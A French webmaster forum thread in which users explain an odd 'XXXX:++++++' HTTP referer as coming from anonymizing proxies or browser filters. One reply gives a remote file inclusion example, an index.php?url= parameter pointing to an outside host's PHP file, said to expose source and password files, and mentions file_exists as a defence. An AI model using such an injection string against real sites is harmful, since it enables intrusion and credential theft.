provenance XXXX:++++++++++++++++

S
sietjp
WRInaute occasionnel
Bonjour,
Depuis une semaine , j'ai vu arriver 2 fois sur la page d'acceuil de mon site un internaute dont l'http referer est "XXXX:++++++++++++++++" au lieu de l'habituel http ://www . site . com/sdfjkl

j'ai bien fait ma recherche dans webrankinfo comme un bon petit gars qui commence à comprendre comment ça se passe mais je n'ai pas trouvé, peut être avez vous déjà vu ça?
 
F
fredsoft
WRInaute discret
ton script permet d'envoyer du code a distance en faisant un truc du genre index.php?url=http://hackme.free.fr/toto.php par exemple

suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password
 
E
Eservice
WRInaute passionné
sietjp a dit:
peut être avez vous déjà vu ça?
Cliquez pour agrandir...
Bonjour,

oui certains internautes utilisent un filtre Web qui mouline tout ce qui entre et sort de leur navigateur (variable HTTP, javascript, cookies).


Dans ce cas c'est le referer qui est remplacé par n'importe quoi. Ca ne sert à rien à part gêner le suivi d'audience des webmestres. C'est de la paranoïa pure et simple.
 
D
DAVID86
WRInaute impliqué
fredsoft a dit:
ton script permet d'envoyer du code a distance en faisant un truc du genre index.php?url=http://hackme.free.fr/toto.php par exemple

suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password
Cliquez pour agrandir...
non car les chaines de caractères sont validées, et même en essayant des commandes simples, ça bloque . je connaissais cette combine. Mais peut être en as tu une de spéciale?
 
F
fredsoft
WRInaute discret
je pense pas que tu connaisses la combine sinon tu aurais fait la parade gloable la plus simple pour ce genre de faille le test file_exists. J'ai pas testé plus sinon..donc je n'affirme rien...juste qu'il y une possibilité
 
M
Mitirapa
WRInaute passionné
oui provenance XXXX:++++++++++++++++ c'est les logiciels de surf anonymes ou les passerelles sur le web pour surfer anonymes...
 
Vous devez vous connecter ou vous inscrire pour répondre ici.
1.fr
Discussions similaires
D
Backlinks en provenance de Pinterest
Réponses
4
Affichages
3K
Doubrovski
D
P
Plusieurs backlinks en provenance d’une même site
Réponses
2
Affichages
2K
PBG
P
N
Visiteurs en provenance de Youtube ?
Réponses
2
Affichages
2K
Madrileño
Madrileño
S
Liens en provenance d'un annuaire p0rn0 chinois
Réponses
8
Affichages
3K
synops
S
F
Provenance du trafic et cookies
Réponses
11
Affichages
3K
zeb
zeb
indigene
Quel est votre pourcentage de visiteurs en provenance Google ?
Réponses
4
Affichages
2K
Madrileño
Madrileño
A
90% de chute de trafic en provenance de google
Réponses
15
Affichages
3K
marionso
M
W
URL de provenance Adsense
Réponses
4
Affichages
1K
walking7
W
Z
Connaitre le site de provenance d'une conversion
Réponses
10
Affichages
2K
Zbin
Z
D
Tracking des visiteurs au sein de mon site en provenance de newsletter
Réponses
6
Affichages
2K
nickargall
nickargall
J
Page de provenance des liens morts
Réponses
5
Affichages
2K
jer2701
J
M
question visiteur en provenance de 72.14.203.101 / referral ip de google
Réponses
3
Affichages
2K
Leonick
L
N
Conversions en provenance de certaines pages de mon site
Réponses
6
Affichages
1K
loic.
L
L
Filtre de profil : Inclure le trafic en provenance de certains sites seulement
Réponses
6
Affichages
2K
loic.
L
P
Bloquer ou pas bloquer des requêtes en provenance de certains serveurs
Réponses
4
Affichages
3K
polweb
P
R
Redirection en fonction du pays de provenance du visiteur
Réponses
10
Affichages
6K
jcaron
J
L
Comment identifier les mots clés utilisés dans Analytics, en provenance de Google Images
Réponses
4
Affichages
3K
Leonick
L
F
Analytics et tracking : Conservation des requêtes de provenance à un client
Réponses
3
Affichages
2K
Marie-Aude
Marie-Aude
arnaudmn
OVH et provenance du visiteur
Réponses
2
Affichages
2K
forty
forty
F
Valeur des liens en provenance des forums ?
Réponses
8
Affichages
2K
Daddyref
D
Haut